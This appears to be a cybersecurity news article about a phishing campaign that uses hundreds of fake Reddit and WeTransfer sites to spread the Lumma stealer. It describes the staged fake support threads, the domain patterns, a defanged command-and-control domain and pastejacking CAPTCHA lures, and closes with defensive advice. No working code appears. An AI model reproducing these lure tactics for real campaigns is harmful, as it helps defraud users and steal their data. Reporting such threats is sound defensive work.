Security researchers at Sekoia have uncovered an extensive phishing operation utilizing nearly 1,000 fraudulent websites that impersonate popular platforms Reddit and WeTransfer. The sophisticated campaign aims to distribute the dangerous Lumma stealer malware, putting users’ sensitive data at significant risk.
Sophisticated Social Engineering Tactics Revealed
The threat actors have deployed an intricate network of 529 counterfeit Reddit pages and 407 WeTransfer clone sites in this carefully orchestrated campaign. The fake Reddit pages feature convincingly crafted technical support discussions where automated accounts engage in seemingly legitimate conversations. This three-step deception involves one account posting a technical issue, another providing a WeTransfer link claiming to contain a solution, and a third account validating the effectiveness of the proposed fix.
Technical Analysis of Malicious Infrastructure
The investigation reveals distinct patterns in the attackers’ infrastructure. The malicious domains consistently incorporate legitimate brand names combined with random character strings, predominantly using .org and .net top-level domains. When users click the fraudulent WeTransfer links, they unknowingly trigger the download of the Lumma stealer malware from a command-and-control server hosted at weighcobbweo[.]top.
Multi-Vector Distribution Strategy
According to Bleeping Computer’s analysis, the attackers employ multiple distribution channels to maximize their reach. These include malvertising campaigns, SEO poisoning techniques, and targeted phishing messages across social media platforms and messaging applications. The campaign’s sophistication is further evidenced by a parallel attack vector identified by Netskope Threat Labs, involving fake CAPTCHA systems in ClickFix-style attacks.
CAPTCHA-Based Attack Methodology
The cybercriminals leverage an advanced social engineering technique known as ClearFake or OneDrive Pastejacking. This method tricks users into manually executing malicious PowerShell commands under the guise of resolving display issues or completing CAPTCHA verification processes. This technique has gained significant traction among cybercriminal groups due to its effectiveness in bypassing traditional security measures.
To protect against these sophisticated threats, cybersecurity experts recommend implementing a multi-layered defense strategy. This includes maintaining updated antivirus software, enabling advanced email filtering, and conducting regular security awareness training for users. Organizations should particularly focus on educating employees about the dangers of executing unknown commands or downloading files from unverified sources, regardless of how legitimate they may appear. Additionally, implementing DMARC, SPF, and DKIM email authentication protocols can help prevent domain spoofing attempts associated with such phishing campaigns.
